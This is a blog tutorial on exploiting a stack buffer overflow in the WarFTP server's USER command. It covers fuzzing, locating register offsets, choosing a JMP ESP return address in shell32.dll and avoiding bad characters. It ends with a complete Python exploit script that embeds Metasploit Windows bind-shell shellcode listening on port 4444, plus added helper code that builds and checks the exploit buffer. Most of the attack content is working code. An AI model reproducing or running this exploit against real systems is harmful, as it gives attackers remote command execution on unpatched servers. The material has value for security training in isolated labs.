
Sunday, February 5, 2012

Exploit WarFTP With Fuzzing Method (Direct RET Buffer Overflow)


This time I will exploit an application using a fuzzing method. I explained fuzzing in my previous article. The application I want to exploit is WarFTP. In this session I use the following tools:
  1. OllyDbg, on Windows XP in VirtualBox (the target machine)
  2. Netcat (nc), on BackTrack (the attacker machine)
  3. Metasploit Framework
  4. WarFTP server
  5. pattern_create.rb (Metasploit)
  6. pattern_offset.rb (Metasploit)
First, I write a simple fuzzer that sends data over the FTP protocol. The script is written in Python and looks like this:

#!/usr/bin/python
# xfuzz.py: send an oversized argument to the FTP USER command.
# Byte literals (b"...") so the script runs under Python 2 and Python 3.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b"\x41" * 1000                   # 1000 x 'A'
s.connect(('192.168.56.101', 21))         # WarFTP on the Windows XP VM
data = s.recv(1024)                       # read the server banner
print("sending evil data via USER command..")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)                       # reply to USER (empty if the server crashed)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")

I saved this file as xfuzz.py. Next I opened WarFTP on the Windows XP virtual machine and started its service; the WarFTP status changes to IDLE. Then I checked the connection from BackTrack with Netcat: nc 192.168.56.101 21. If the connection succeeds, the server banner appears like this:
Next I ran the fuzzer with python xfuzz.py to see what happens to WarFTP. WarFTP crashed. When I tried to open WarFTP again, it showed an error message like this.


That is because the user configuration file WarFTP keeps was damaged when the fuzzer sent the oversized USER command. The configuration is stored in FtpDaemon.DAT, so I deleted FtpDaemon.DAT and opened WarFTP again, and it worked. I then created a new user, yuza, from the User Security Properties button.
Next I started the WarFTP server from inside OllyDbg.
Then I ran the fuzzer again from BackTrack and watched what happened to WarFTP in OllyDbg.
In the result below, four registers are affected by the data sent by the fuzzer: ESP, EBP, EDI and EIP. EBP, EDI and EIP contain 0x41414141, which is the ASCII letter A four times, because the saved values were overwritten on the stack. ESP is not overwritten the same way: it is still a valid stack pointer, but the memory it points to now holds our A bytes, which is what makes the next steps possible.
Next, in the BackTrack console I changed to the directory /pentest/exploits/framework/tools/ with cd /pentest/exploits/framework/tools/ and ran ./pattern_create.rb 1000 > string_pattern.txt to make a 1000-byte pattern in which every four-byte sequence is unique. The contents of string_pattern.txt look like this:
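The post goes straight to a single 1000-byte buffer. As an added example that is not part of the original post, here is the same fuzzer generalized to step the length up and report when the service stops answering, which brackets the size that triggers the overflow. The host and port are the post's own; the step sizes, the timeout and the crash heuristic (no reply to USER, or no connection on the next attempt) are my assumptions.

```python
#!/usr/bin/python
# Added example, not the original post's xfuzz.py: instead of sending one
# 1000-byte USER argument, step the length up until the server stops
# answering, which brackets the size that triggers the overflow.
# Assumptions (not from the page): the step sizes, the timeout, and the
# crash heuristic (no reply to USER, or no connection on the next attempt).
import socket

HOST = "192.168.56.101"   # the post's WarFTP VM
PORT = 21


def build_user_command(length, byte=b"A"):
    """Raw FTP line 'USER ' + length copies of byte + CRLF, as bytes."""
    return b"USER " + byte * length + b"\r\n"


def fuzz_lengths(start=100, step=100, stop=2000):
    """Buffer lengths to try, smallest first."""
    return list(range(start, stop + 1, step))


def send_user(host, port, line, timeout=3.0):
    """Send one USER line; return the reply, or b'' if the server went silent."""
    s = socket.create_connection((host, port), timeout=timeout)
    try:
        s.recv(1024)              # banner
        s.sendall(line)
        return s.recv(1024)       # reply to USER; empty if the daemon died
    except socket.timeout:
        return b""
    finally:
        s.close()


def fuzz(host, port):
    """Return the first length after which WarFTP no longer answers, or None."""
    for n in fuzz_lengths():
        try:
            reply = send_user(host, port, build_user_command(n))
        except socket.error as e:
            print("length %d: no connection (%s), server is probably down" % (n, e))
            return n
        if not reply:
            print("length %d: no reply, probable crash" % n)
            return n
        print("length %d: %r" % (n, reply.strip()))
    return None


if __name__ == "__main__":
    fuzz(HOST, PORT)
```

Run it against a fresh WarFTP instance; the length printed last is the smallest step that killed the daemon, and the real threshold lies between it and the previous step. Remember that WarFTP has to be restarted (and FtpDaemon.DAT possibly deleted) after each crash.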


Next I copied this pattern into the fuzzer script in place of the A bytes. The script now looks like this:


#!/usr/bin/python
# xfuzz.py with the pattern_create.rb output instead of 'A' bytes, so the value
# that lands in each register tells us its offset in the buffer.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
# buffer = b"\x41" * 1000                  # the plain 'A' buffer from the first run
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                       # banner
print("sending evil data via USER command..")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")


Then I ran the fuzzer again with python xfuzz.py and got the following register values in WarFTP:
After that I used pattern_offset.rb to work out how many bytes into the pattern the values now in the registers are. In the same directory, /pentest/exploits/framework/tools/, I ran ./pattern_offset.rb 32714131 (the value now in EIP) and then ./pattern_offset.rb q4Aq5Aq (the first bytes at the address in ESP), with this result:
From the result above I know that 485 bytes are needed to reach the saved return address that is loaded into EIP, and 493 bytes to reach the position ESP points to after the crash. Next I changed the fuzzer so that it places a chosen value at the EIP position, to confirm the offset: I set EIP to DEADBEEF, written in little-endian byte order as \xEF\xBE\xAD\xDE. The changed script looks like this:


#!/usr/bin/python
# Confirm the EIP offset: 485 filler bytes, then the value that should land in EIP.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
nilaiEIP = b"\x90" * 485                  # nilaiEIP = "EIP value": NOP (0x90) filler up to the return address
nilaiEIP += b"\xEF\xBE\xAD\xDE"           # 0xDEADBEEF in little-endian byte order
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                       # banner
print("sending evil data via USER command..")
s.send(b'USER ' + nilaiEIP + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")



After that I started WarFTP again from OllyDbg and ran the fuzzer again. The result is shown below: EIP now reads DEADBEEF, so I have successfully changed the EIP register.
The next step is to write data at the position ESP points to. ESP is the stack pointer, and after the crash it points into our buffer on the stack; if I can fill that area with bytes of my choosing, the payload can be placed there. So I changed the fuzzer script again:
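As an added example (not the post's own code), here is the logic behind pattern_create.rb and pattern_offset.rb in Python, so the two offsets above can be reproduced without Metasploit and the little-endian step is explicit: OllyDbg shows EIP as 32714131, but the bytes on the stack were 31 41 71 32, which is the text 1Aq2 in the pattern.

```python
#!/usr/bin/python
# Added example (not the original post's code): a Python re-implementation of
# the pattern_create.rb / pattern_offset.rb logic used above, so the offsets
# 485 (EIP) and 493 (ESP) can be reproduced and understood without Metasploit.
import string
import struct

MAX_UNIQUE = 26 * 26 * 10 * 3   # 20280 bytes before the pattern would repeat


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2...Az9Ba0... cut to `length` bytes.

    Every 4-byte window in the first 20280 bytes is unique, which is what lets
    a register value be mapped back to a single offset.
    """
    if length > MAX_UNIQUE:
        raise ValueError("pattern longer than %d bytes is no longer unique" % MAX_UNIQUE)
    chunks = [u + l + d
              for u in string.ascii_uppercase
              for l in string.ascii_lowercase
              for d in string.digits]
    return "".join(chunks)[:length]


def pattern_offset(needle, length=1000):
    """Offset of `needle` (e.g. 'q4Aq5Aq' copied from the stack window) in the
    pattern of the given length, or -1 if it does not occur."""
    return pattern_create(length).find(needle)


def offset_from_register(value, length=1000):
    """Offset for a 32-bit register value as shown by OllyDbg (e.g. EIP = 0x32714131).

    x86 is little-endian: the value 0x32714131 was loaded from the bytes
    31 41 71 32 in memory, i.e. the text '1Aq2', so the bytes are reversed
    before searching. Returns -1 if the value is not from the pattern.
    """
    needle = struct.pack("<I", value).decode("latin-1")
    return pattern_offset(needle, length)


if __name__ == "__main__":
    print(pattern_create(1000))
    print("EIP 0x32714131 -> offset %d" % offset_from_register(0x32714131))  # 485
    print("ESP 'q4Aq5Aq'  -> offset %d" % pattern_offset("q4Aq5Aq"))         # 493
```

The two results show why the final buffer has a 4-byte gap after the return address: EIP is taken from offsets 485 to 488, and ESP points to offset 493, so bytes 489 to 492 are skipped by the ret instruction and anything placed from 493 onwards is where a JMP ESP will land.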


#!/usr/bin/python
# Fill the area ESP points to (offset 493 onwards) with INT3 (0xCC) so it is
# easy to see in the OllyDbg stack window.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b"\x90" * 485                    # NOP filler up to the saved return address
buffer += b"\xEF\xBE\xAD\xDE"             # EIP = 0xDEADBEEF (little-endian)
buffer += b"\x90" * (493 - len(buffer))   # 4 more NOPs up to where ESP points
buffer += b"\xCC" * (1000 - len(buffer))  # INT3 breakpoints from ESP to the end
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                       # banner
print("sending evil data via USER command..")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")


Then I started WarFTP again from OllyDbg and ran the fuzzer. The Registers and Stack windows look like this:
After that I looked at the list of libraries loaded by WarFTP: in OllyDbg, View -> Executable Modules.
From the list of modules above I chose SHELL32.dll as the place to take the jump into the stack from. Double-clicking shell32.dll opens a window like this:
Then I searched that module for a JMP ESP instruction. JMP ESP transfers execution to the address in ESP, which after the overflow points into our buffer. I cannot simply put the stack address itself into EIP, because the stack address is not reliably the same from one run to the next, but the address of a JMP ESP inside a loaded module is, so I overwrite EIP with that address instead. The flow is: EIP -> address of the JMP ESP instruction -> JMP ESP executes -> ESP -> our buffer on the stack -> payload runs. In the main window, right-click -> Search for -> Command and type JMP ESP.
This is what I found:
The address chosen for the exploit must not contain the bytes \x00, \x0a or \x0d: a NUL byte ends the string the server copies, and CR/LF end the FTP command line, so any of these three would cut the buffer short and break the payload. In my case the address found is 7C9D30D7 FFE4 JMP ESP (FFE4 is the opcode of JMP ESP). This address is specific to the shell32.dll on this Windows XP VM; on another Windows version or service pack it will differ and must be looked up again.
Next I changed the fuzzer again so that it sets EIP to the address of the JMP ESP in shell32.dll. 7C9D30D7 in little-endian byte order is \xD7\x30\x9D\x7C. The script now looks like this:


#!/usr/bin/python
# EIP = address of JMP ESP in shell32.dll; ESP then points to our INT3 bytes,
# so OllyDbg should break on the first 0xCC inside the buffer.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b"\x90" * 485                    # NOP filler up to the saved return address
buffer += b"\xD7\x30\x9D\x7C"             # 0x7C9D30D7: JMP ESP in shell32.dll (this XP VM), little-endian
buffer += b"\x90" * (493 - len(buffer))   # 4 NOPs up to where ESP points
buffer += b"\xCC" * (1000 - len(buffer))  # INT3 breakpoints: execution should stop here
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                       # banner
print("sending evil data via USER command..")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")


After that I started WarFTP again in OllyDbg and ran the script above. The result looks like this (if the jump works, OllyDbg stops on the first \xCC, which is an INT3 breakpoint, inside our buffer):

Next I used the Metasploit Framework to generate the payload, through its web interface.
I chose the Windows Shell Bind TCP payload, which listens on port 4444 on the target, and generated it. The bad characters \x00, \x0a and \x0d found above must be excluded from the generated payload, otherwise it is cut short in the same way the return address would be.




I copied the generated payload into the fuzzer script. The 31 NOPs after the return address make sure that ESP, which points to offset 493 (4 bytes after the end of the overwritten return address), lands inside a NOP sled that slides into the shellcode at offset 520:

#!/usr/bin/python
# Final exploit: overwrite EIP with JMP ESP, put a NOP sled where ESP points,
# then the Metasploit Windows Shell Bind TCP payload (listens on port 4444).
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b"\x90" * 485                    # NOP filler up to the saved return address
buffer += b"\xD7\x30\x9D\x7C"             # 0x7C9D30D7: JMP ESP in shell32.dll (this XP VM)
buffer += b"\x90" * 31                    # NOP sled: ESP points to offset 493, shellcode starts at 520
# Windows Shell Bind TCP payload generated by Metasploit (no \x00, \x0a, \x0d bytes)
buffer += b"\x29\xc9\xda\xc2\xb1\x51\xbf\x79\x36\x4e\x14\xd9\x74\x24\xf4\x5e"
buffer += b"\x83\xee\xfc\x31\x7e\x11\x03\x07\x27\xac\xe1\x0b\x2d\xdb\x47\x1b"
buffer += b"\x4b\xe4\xa7\x24\xcc\x90\x34\xfe\x29\x2c\x81\xc2\xba\x4e\x0f\x42"
buffer += b"\xbc\x41\x84\xfd\xa6\x16\xc4\x21\xd6\xc3\xb2\xaa\xec\x98\x44\x42"
buffer += b"\x3d\x5f\xdf\x36\xba\x9f\x94\x41\x02\xd5\x58\x4c\x46\x01\x96\x75"
buffer += b"\x12\xf2\x7f\xfc\x7f\x71\x20\xda\x7e\x6d\xb9\xa9\x8d\x3a\xcd\xf2"
buffer += b"\x91\xbd\x3a\x0f\x86\x36\x35\x63\xf2\x54\x27\xb8\xcb\xbf\xc3\xb5"
buffer += b"\x6f\x70\x87\x89\x63\xfb\xe7\x15\xd1\x70\x47\x2d\x77\xef\xc6\x63"
buffer += b"\x89\x03\x86\x84\x43\xbd\x74\x1c\x04\x71\x49\x88\xa3\x06\x9f\x17"
buffer += b"\x18\x16\x0f\xcf\x6b\x05\x4c\x34\x3c\x29\x7b\x15\x35\x30\xe2\x28"
buffer += b"\xa8\xb3\xe9\x7f\x59\xc6\x12\xaf\xf5\x1f\xe5\xba\xab\xf7\x09\x92"
buffer += b"\xe7\xa4\xa6\x49\x5b\x08\x1a\x2e\x08\x71\x4c\xd6\xc6\x9c\x31\x70"
buffer += b"\x44\x16\x28\xe9\x02\x8c\xb1\x61\x14\x9b\x3a\x57\xf0\x34\x94\x02"
buffer += b"\xfa\xe5\x7e\x08\xa9\x28\x96\x07\x4d\xe2\x3b\xf2\x4e\xdb\xd4\x19"
buffer += b"\xf9\x5a\x6d\xb6\x05\xb4\x3e\x6c\xae\x6c\x40\x5c\xdd\xe7\x59\x25"
buffer += b"\x24\x8e\xf2\x2a\x7e\x24\x02\x04\x19\xad\x98\xc2\x8e\x52\x0c\x83"
buffer += b"\xaa\xff\x9e\xca\x1d\xcc\x96\x0b\x37\x88\x21\x31\xf9\xd0\xc1\x1f"
buffer += b"\x04\x92\x08\xa1\xbb\x3f\xc0\xd0\x46\x78\x4d\x41\x1d\x10\xe3\x6b"
buffer += b"\xd1\xf7\xfc\xe6\x52\x07\xd4\x53\x0c\xa5\x88\x32\xe3\x23\x2a\xe5"
buffer += b"\x52\xe1\x7d\xfa\x85\x61\xd3\xdd\x23\xbc\x78\x22\xfd\x2a\x80\x23"
buffer += b"\x35\x54\xae\x50\x6d\x56\xcc\xa2\xf6\x59\x05\x78\x08\x75\xc2\x02"
buffer += b"\x2e\x94\x60\xa9\x31\x8f\x78\x9d"
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                       # banner
print("sending evil data via USER command..")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")


Then I started the WarFTP server directly, without OllyDbg, and ran the script again. The WarFTP server crashed.
Then I connected to the bind shell with telnet 192.168.56.101 4444 and got this result:
The exploit succeeded. :D
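As an added example, not the post's own script, here is the buffer assembly from the final script turned into a function with the checks a practitioner wants before sending anything: the return address is packed little-endian and checked for the bad characters \x00, \x0a and \x0d, the payload is checked for them too, the gap between the overwritten return address and ESP is computed from the two measured offsets, and the total length is kept at the size that crashed the server. The offsets and the JMP ESP address are the post's values from the Windows XP VM; the function and constant names, the NOP sled size and the INT3 placeholder payload are my assumptions. The generated bind-shell bytes from the script above go in the payload slot.

```python
#!/usr/bin/python
# Added example (not the post's own script): build the exploit buffer from the
# measured offsets and check it before anything is sent.
# Assumptions: the constants below come from the post's Windows XP VM; the
# JMP ESP address is specific to that shell32.dll and must be re-found elsewhere.
import socket
import struct

EIP_OFFSET = 485             # pattern_offset 32714131: bytes before the saved return address
ESP_OFFSET = 493             # pattern_offset q4Aq5Aq: where ESP points after the crash
TOTAL_LEN = 1000             # size that crashed the server
JMP_ESP = 0x7C9D30D7         # FF E4 in shell32.dll on the post's XP VM (not portable)
BAD_CHARS = b"\x00\x0a\x0d"  # NUL ends the copied string, CR/LF end the FTP line


def find_bad_chars(data, bad=BAD_CHARS):
    """Sorted list of bad byte values present in data (empty list means clean)."""
    return sorted(set(bytearray(data)) & set(bytearray(bad)))


def ret_is_usable(addr):
    """True if the little-endian encoding of addr contains no bad character."""
    return not find_bad_chars(struct.pack("<I", addr))


def build_exploit(payload, ret=JMP_ESP, eip_offset=EIP_OFFSET,
                  esp_offset=ESP_OFFSET, total=TOTAL_LEN, nop_sled=16):
    """Layout: [NOP*eip_offset][ret][NOP to esp_offset][NOP sled][payload][INT3 pad]

    After JMP ESP, execution starts at esp_offset, slides down the NOPs and
    runs the payload. The 0xCC padding is INT3, so a stray jump into it stops
    in OllyDbg instead of silently running garbage.
    """
    if esp_offset < eip_offset + 4:
        raise ValueError("ESP offset overlaps the return address")
    if not ret_is_usable(ret):
        raise ValueError("return address 0x%08X contains a bad character" % ret)
    bad = find_bad_chars(payload)
    if bad:
        raise ValueError("payload contains bad characters %r" % bad)
    buf = b"\x90" * eip_offset
    buf += struct.pack("<I", ret)                # 0x7C9D30D7 -> D7 30 9D 7C
    buf += b"\x90" * (esp_offset - len(buf))     # gap between saved EIP and ESP
    buf += b"\x90" * nop_sled
    buf += payload
    if len(buf) > total:
        raise ValueError("buffer is %d bytes but only %d fit" % (len(buf), total))
    return buf + b"\xCC" * (total - len(buf))


def eip_value(buf, eip_offset=EIP_OFFSET):
    """The 32-bit value EIP will receive from this buffer (sanity check)."""
    return struct.unpack("<I", buf[eip_offset:eip_offset + 4])[0]


def send_exploit(host, port, buf):
    """Same FTP exchange as xfuzz.py: banner, USER <buf>, PASS, close."""
    s = socket.create_connection((host, port), timeout=5)
    s.recv(1024)
    s.send(b"USER " + buf + b"\r\n")
    try:
        s.recv(1024)
        s.send(b"PASS PASSWORD\r\n")
    except socket.error:
        pass                                     # server crashed or is busy running the payload
    finally:
        s.close()


if __name__ == "__main__":
    # INT3 placeholder payload; the generated bind-shell bytes go in this slot.
    exploit = build_exploit(b"\xCC" * 8)
    print("EIP will be 0x%08X, payload at offset %d" % (eip_value(exploit), ESP_OFFSET + 16))
    send_exploit("192.168.56.101", 21, exploit)
```

With the placeholder payload the script behaves like the JMP ESP test above and should stop OllyDbg on an INT3; swapping in the bind-shell bytes gives the final exploit. Because the checks run before the connection is opened, a return address or payload that contains \x00, \x0a or \x0d is rejected instead of producing a confusing crash on the target.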
